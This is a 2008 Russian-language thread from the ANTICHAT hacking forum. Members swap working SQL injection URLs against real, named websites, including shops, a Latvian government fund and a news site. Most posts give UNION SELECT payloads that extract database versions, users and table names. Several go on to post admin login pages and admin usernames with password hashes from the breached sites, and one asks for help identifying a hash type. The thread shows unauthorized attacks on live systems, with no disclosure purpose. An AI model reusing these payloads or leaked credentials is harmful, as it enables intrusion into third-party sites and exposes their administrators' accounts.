HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.08.2008, 13:26
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

http://fastflowerstoukraine.com/index.php?pageid=5+union+select+1,2,3,4,5,6,7,8,9, 10,11,12--
кто раскрутит до конца?

http://schalter.ru/page.php?id_level=

Последний раз редактировалось Calcutta; 12.08.2008 в 13:40..
 
Ответить с цитированием

  #2  
Старый 12.08.2008, 13:57
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

Цитата:
Сообщение от Calcutta  
http://fastflowerstoukraine.com/index.php?pageid=5+union+select+1,2,3,4,5,6,7,8,9, 10,11,12--
кто раскрутит до конца?

http://schalter.ru/page.php?id_level=
обходим гору

http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion(),database()),7,8,9,10,11,12,13,14,15,16,17/*
 
Ответить с цитированием

  #3  
Старый 12.08.2008, 14:11
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

Цитата:
Сообщение от nicusor  
обходим гору

http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion(),database()),7,8,9,10,11,12,13,14,15,16,17/*
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ),7,8,9,10,11,12,13,14,15,16,17+from+information_s chema.tables+limit+0,1/**
а дальше?
 
Ответить с цитированием

  #4  
Старый 12.08.2008, 14:55
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

Цитата:
Сообщение от Calcutta  
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ),7,8,9,10,11,12,13,14,15,16,17+from+information_s chema.tables+limit+0,1/**
а дальше?
переходим в Ваши вопросы по уязвимостям. https://forum.antichat.ru/lastpostinthread46016.html
 
Ответить с цитированием

  #5  
Старый 12.08.2008, 14:29
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.lvif.gov.lv/?object_id=-376[sql]
Dbname: videsinvfonds
Version: 5.0.24
User:videsinvfonds@localhost

логиниться - нелогинится..продолжение в админках)
 
Ответить с цитированием

  #6  
Старый 12.08.2008, 14:56
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


По умолчанию

therapyshoppe.com
Код:
http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat_ws(0x3a3a,version(),user(),database())/*
5.0.45-log::therapyshoppe@cgi0403.int.bizland.net::therap yshoppe
Код:
http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat(table_name,0x3a3a3a,table_schema)+from+information_schema.tables+limit+20,1/*
Список таблиц:
Код:
categories
descriptions
products
specials
Собственно нечего интересного(
 
Ответить с цитированием

  #7  
Старый 12.08.2008, 15:01
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600

Репутация: 850
Exclamation

http://www.cageprisoners.com/

Код HTML:
http://www.cageprisoners.com/articles.php?id=25632'+order+by+6/*
Кол-во столбцов =6

Код HTML:
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,4,5,6/*
version : 5.0.45
database : cagepris_cms
user : cagepris_cms@localhost

Код HTML:
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,table_name,4,5,6+from+information_schema.tables+limit+17,10/*
Таблица - admins

Хеш пароля : QYYoUiD1cbIlTi2jPbgoQ0

Админка:
Код HTML:
http://www.cageprisoners.com/admin/login.php?accessdenied=%2Fadmin%2F
P.S. Подскажите что за вид хеша!?

Последний раз редактировалось luz3r; 12.08.2008 в 15:04..
 
Ответить с цитированием

  #8  
Старый 12.08.2008, 19:30
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
По умолчанию

http://allmitino.ru
5-ая ветка
Цитата:
http://allmitino.ru/catalog/responses/?org_id=-1690+union+select+1,2,3,4,5,6,7,version(),9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31
есть таблички phpbb_users,allm_admin,allm_users

админка

katie:::03e682cf75e3b31d
kirill:::10edb41c7e718497

пароли вроде шифровались mysql

Последний раз редактировалось MirA; 12.08.2008 в 20:29..
 
Ответить с цитированием

  #9  
Старый 12.08.2008, 21:17
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!
 
Ответить с цитированием

  #10  
Старый 13.08.2008, 09:14
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию

Цитата:
Сообщение от BanQui  
Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!
Ошибки при реге , это у них SQL сервер недоступен/орублен.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.